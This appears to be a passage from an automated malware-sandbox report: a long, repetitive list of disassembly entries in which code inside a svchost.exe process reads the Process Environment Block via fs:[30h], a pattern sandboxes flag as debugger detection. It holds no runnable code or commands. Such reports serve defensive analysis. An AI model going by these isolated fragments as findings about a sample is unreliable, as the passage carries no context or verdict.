Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B601F8 mov eax, dword ptr fs:[00000030h]	6_2_03B601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B551EF mov eax, dword ptr fs:[00000030h]	6_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B551EF mov eax, dword ptr fs:[00000030h]	6_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B551EF mov eax, dword ptr fs:[00000030h]	6_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B551EF mov eax, dword ptr fs:[00000030h]	6_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B551EF mov eax, dword ptr fs:[00000030h]	6_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B551EF mov eax, dword ptr fs:[00000030h]	6_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B551EF mov eax, dword ptr fs:[00000030h]	6_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B551EF mov eax, dword ptr fs:[00000030h]	6_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B551EF mov eax, dword ptr fs:[00000030h]	6_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B551EF mov eax, dword ptr fs:[00000030h]	6_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B551EF mov eax, dword ptr fs:[00000030h]	6_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B551EF mov eax, dword ptr fs:[00000030h]	6_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B551EF mov eax, dword ptr fs:[00000030h]	6_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B351ED mov eax, dword ptr fs:[00000030h]	6_2_03B351ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6D1D0 mov eax, dword ptr fs:[00000030h]	6_2_03B6D1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6D1D0 mov ecx, dword ptr fs:[00000030h]	6_2_03B6D1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF61C3 mov eax, dword ptr fs:[00000030h]	6_2_03BF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF61C3 mov eax, dword ptr fs:[00000030h]	6_2_03BF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B31131 mov eax, dword ptr fs:[00000030h]	6_2_03B31131
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B31131 mov eax, dword ptr fs:[00000030h]	6_2_03B31131
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2B136 mov eax, dword ptr fs:[00000030h]	6_2_03B2B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2B136 mov eax, dword ptr fs:[00000030h]	6_2_03B2B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2B136 mov eax, dword ptr fs:[00000030h]	6_2_03B2B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2B136 mov eax, dword ptr fs:[00000030h]	6_2_03B2B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C05152 mov eax, dword ptr fs:[00000030h]	6_2_03C05152
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B60124 mov eax, dword ptr fs:[00000030h]	6_2_03B60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BDA118 mov ecx, dword ptr fs:[00000030h]	6_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BDA118 mov eax, dword ptr fs:[00000030h]	6_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BDA118 mov eax, dword ptr fs:[00000030h]	6_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BDA118 mov eax, dword ptr fs:[00000030h]	6_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF0115 mov eax, dword ptr fs:[00000030h]	6_2_03BF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172 mov eax, dword ptr fs:[00000030h]	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC9179 mov eax, dword ptr fs:[00000030h]	6_2_03BC9179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B37152 mov eax, dword ptr fs:[00000030h]	6_2_03B37152
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2C156 mov eax, dword ptr fs:[00000030h]	6_2_03B2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B36154 mov eax, dword ptr fs:[00000030h]	6_2_03B36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B36154 mov eax, dword ptr fs:[00000030h]	6_2_03B36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC4144 mov eax, dword ptr fs:[00000030h]	6_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC4144 mov eax, dword ptr fs:[00000030h]	6_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC4144 mov ecx, dword ptr fs:[00000030h]	6_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC4144 mov eax, dword ptr fs:[00000030h]	6_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC4144 mov eax, dword ptr fs:[00000030h]	6_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B29148 mov eax, dword ptr fs:[00000030h]	6_2_03B29148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B29148 mov eax, dword ptr fs:[00000030h]	6_2_03B29148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B29148 mov eax, dword ptr fs:[00000030h]	6_2_03B29148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B29148 mov eax, dword ptr fs:[00000030h]	6_2_03B29148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF60B8 mov eax, dword ptr fs:[00000030h]	6_2_03BF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]	6_2_03BF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C050D9 mov eax, dword ptr fs:[00000030h]	6_2_03C050D9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B35096 mov eax, dword ptr fs:[00000030h]	6_2_03B35096
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5D090 mov eax, dword ptr fs:[00000030h]	6_2_03B5D090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5D090 mov eax, dword ptr fs:[00000030h]	6_2_03B5D090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6909C mov eax, dword ptr fs:[00000030h]	6_2_03B6909C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3208A mov eax, dword ptr fs:[00000030h]	6_2_03B3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2D08D mov eax, dword ptr fs:[00000030h]	6_2_03B2D08D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]	6_2_03B2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B720F0 mov ecx, dword ptr fs:[00000030h]	6_2_03B720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B550E4 mov eax, dword ptr fs:[00000030h]	6_2_03B550E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B550E4 mov ecx, dword ptr fs:[00000030h]	6_2_03B550E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]	6_2_03B2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B380E9 mov eax, dword ptr fs:[00000030h]	6_2_03B380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB20DE mov eax, dword ptr fs:[00000030h]	6_2_03BB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B590DB mov eax, dword ptr fs:[00000030h]	6_2_03B590DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B470C0 mov eax, dword ptr fs:[00000030h]	6_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B470C0 mov ecx, dword ptr fs:[00000030h]	6_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B470C0 mov ecx, dword ptr fs:[00000030h]	6_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B470C0 mov eax, dword ptr fs:[00000030h]	6_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B470C0 mov ecx, dword ptr fs:[00000030h]	6_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B470C0 mov ecx, dword ptr fs:[00000030h]	6_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B470C0 mov eax, dword ptr fs:[00000030h]	6_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B470C0 mov eax, dword ptr fs:[00000030h]	6_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B470C0 mov eax, dword ptr fs:[00000030h]	6_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B470C0 mov eax, dword ptr fs:[00000030h]	6_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B470C0 mov eax, dword ptr fs:[00000030h]	6_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B470C0 mov eax, dword ptr fs:[00000030h]	6_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B470C0 mov eax, dword ptr fs:[00000030h]	6_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B470C0 mov eax, dword ptr fs:[00000030h]	6_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B470C0 mov eax, dword ptr fs:[00000030h]	6_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B470C0 mov eax, dword ptr fs:[00000030h]	6_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B470C0 mov eax, dword ptr fs:[00000030h]	6_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B470C0 mov eax, dword ptr fs:[00000030h]	6_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF903E mov eax, dword ptr fs:[00000030h]	6_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF903E mov eax, dword ptr fs:[00000030h]	6_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF903E mov eax, dword ptr fs:[00000030h]	6_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF903E mov eax, dword ptr fs:[00000030h]	6_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2A020 mov eax, dword ptr fs:[00000030h]	6_2_03B2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2C020 mov eax, dword ptr fs:[00000030h]	6_2_03B2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C05060 mov eax, dword ptr fs:[00000030h]	6_2_03C05060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4E016 mov eax, dword ptr fs:[00000030h]	6_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4E016 mov eax, dword ptr fs:[00000030h]	6_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4E016 mov eax, dword ptr fs:[00000030h]	6_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4E016 mov eax, dword ptr fs:[00000030h]	6_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B41070 mov eax, dword ptr fs:[00000030h]	6_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B41070 mov ecx, dword ptr fs:[00000030h]	6_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B41070 mov eax, dword ptr fs:[00000030h]	6_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B41070 mov eax, dword ptr fs:[00000030h]	6_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B41070 mov eax, dword ptr fs:[00000030h]	6_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B41070 mov eax, dword ptr fs:[00000030h]	6_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B41070 mov eax, dword ptr fs:[00000030h]	6_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B41070 mov eax, dword ptr fs:[00000030h]	6_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B41070 mov eax, dword ptr fs:[00000030h]	6_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B41070 mov eax, dword ptr fs:[00000030h]	6_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B41070 mov eax, dword ptr fs:[00000030h]	6_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B41070 mov eax, dword ptr fs:[00000030h]	6_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B41070 mov eax, dword ptr fs:[00000030h]	6_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5C073 mov eax, dword ptr fs:[00000030h]	6_2_03B5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B32050 mov eax, dword ptr fs:[00000030h]	6_2_03B32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BD705E mov ebx, dword ptr fs:[00000030h]	6_2_03BD705E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BD705E mov eax, dword ptr fs:[00000030h]	6_2_03BD705E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5B052 mov eax, dword ptr fs:[00000030h]	6_2_03B5B052
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5D7B0 mov eax, dword ptr fs:[00000030h]	6_2_03B5D7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	6_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	6_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	6_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	6_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	6_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	6_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	6_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	6_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	6_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB97A9 mov eax, dword ptr fs:[00000030h]	6_2_03BB97A9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BBF7AF mov eax, dword ptr fs:[00000030h]	6_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BBF7AF mov eax, dword ptr fs:[00000030h]	6_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BBF7AF mov eax, dword ptr fs:[00000030h]	6_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BBF7AF mov eax, dword ptr fs:[00000030h]	6_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BBF7AF mov eax, dword ptr fs:[00000030h]	6_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B307AF mov eax, dword ptr fs:[00000030h]	6_2_03B307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BEF78A mov eax, dword ptr fs:[00000030h]	6_2_03BEF78A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B347FB mov eax, dword ptr fs:[00000030h]	6_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B347FB mov eax, dword ptr fs:[00000030h]	6_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3D7E0 mov ecx, dword ptr fs:[00000030h]	6_2_03B3D7E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B527ED mov eax, dword ptr fs:[00000030h]	6_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B527ED mov eax, dword ptr fs:[00000030h]	6_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B527ED mov eax, dword ptr fs:[00000030h]	6_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]	6_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B357C0 mov eax, dword ptr fs:[00000030h]	6_2_03B357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B357C0 mov eax, dword ptr fs:[00000030h]	6_2_03B357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B357C0 mov eax, dword ptr fs:[00000030h]	6_2_03B357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C037B6 mov eax, dword ptr fs:[00000030h]	6_2_03C037B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B29730 mov eax, dword ptr fs:[00000030h]	6_2_03B29730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B29730 mov eax, dword ptr fs:[00000030h]	6_2_03B29730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B65734 mov eax, dword ptr fs:[00000030h]	6_2_03B65734
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3973A mov eax, dword ptr fs:[00000030h]	6_2_03B3973A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3973A mov eax, dword ptr fs:[00000030h]	6_2_03B3973A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C03749 mov eax, dword ptr fs:[00000030h]	6_2_03C03749
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6273C mov eax, dword ptr fs:[00000030h]	6_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6273C mov ecx, dword ptr fs:[00000030h]	6_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6273C mov eax, dword ptr fs:[00000030h]	6_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BAC730 mov eax, dword ptr fs:[00000030h]	6_2_03BAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BEF72E mov eax, dword ptr fs:[00000030h]	6_2_03BEF72E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B33720 mov eax, dword ptr fs:[00000030h]	6_2_03B33720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4F720 mov eax, dword ptr fs:[00000030h]	6_2_03B4F720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4F720 mov eax, dword ptr fs:[00000030h]	6_2_03B4F720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4F720 mov eax, dword ptr fs:[00000030h]	6_2_03B4F720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF972B mov eax, dword ptr fs:[00000030h]	6_2_03BF972B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6C720 mov eax, dword ptr fs:[00000030h]	6_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6C720 mov eax, dword ptr fs:[00000030h]	6_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B30710 mov eax, dword ptr fs:[00000030h]	6_2_03B30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B60710 mov eax, dword ptr fs:[00000030h]	6_2_03B60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6F71F mov eax, dword ptr fs:[00000030h]	6_2_03B6F71F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6F71F mov eax, dword ptr fs:[00000030h]	6_2_03B6F71F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B37703 mov eax, dword ptr fs:[00000030h]	6_2_03B37703
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B35702 mov eax, dword ptr fs:[00000030h]	6_2_03B35702
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B35702 mov eax, dword ptr fs:[00000030h]	6_2_03B35702
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6C700 mov eax, dword ptr fs:[00000030h]	6_2_03B6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B38770 mov eax, dword ptr fs:[00000030h]	6_2_03B38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B40770 mov eax, dword ptr fs:[00000030h]	6_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B40770 mov eax, dword ptr fs:[00000030h]	6_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B40770 mov eax, dword ptr fs:[00000030h]	6_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B40770 mov eax, dword ptr fs:[00000030h]	6_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B40770 mov eax, dword ptr fs:[00000030h]	6_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B40770 mov eax, dword ptr fs:[00000030h]	6_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B40770 mov eax, dword ptr fs:[00000030h]	6_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B40770 mov eax, dword ptr fs:[00000030h]	6_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B40770 mov eax, dword ptr fs:[00000030h]	6_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B40770 mov eax, dword ptr fs:[00000030h]	6_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B40770 mov eax, dword ptr fs:[00000030h]	6_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B40770 mov eax, dword ptr fs:[00000030h]	6_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2B765 mov eax, dword ptr fs:[00000030h]	6_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2B765 mov eax, dword ptr fs:[00000030h]	6_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2B765 mov eax, dword ptr fs:[00000030h]	6_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2B765 mov eax, dword ptr fs:[00000030h]	6_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B30750 mov eax, dword ptr fs:[00000030h]	6_2_03B30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72750 mov eax, dword ptr fs:[00000030h]	6_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72750 mov eax, dword ptr fs:[00000030h]	6_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB4755 mov eax, dword ptr fs:[00000030h]	6_2_03BB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B43740 mov eax, dword ptr fs:[00000030h]	6_2_03B43740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B43740 mov eax, dword ptr fs:[00000030h]	6_2_03B43740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B43740 mov eax, dword ptr fs:[00000030h]	6_2_03B43740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6674D mov esi, dword ptr fs:[00000030h]	6_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6674D mov eax, dword ptr fs:[00000030h]	6_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6674D mov eax, dword ptr fs:[00000030h]	6_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C0B73C mov eax, dword ptr fs:[00000030h]	6_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C0B73C mov eax, dword ptr fs:[00000030h]	6_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C0B73C mov eax, dword ptr fs:[00000030h]	6_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C0B73C mov eax, dword ptr fs:[00000030h]	6_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B276B2 mov eax, dword ptr fs:[00000030h]	6_2_03B276B2
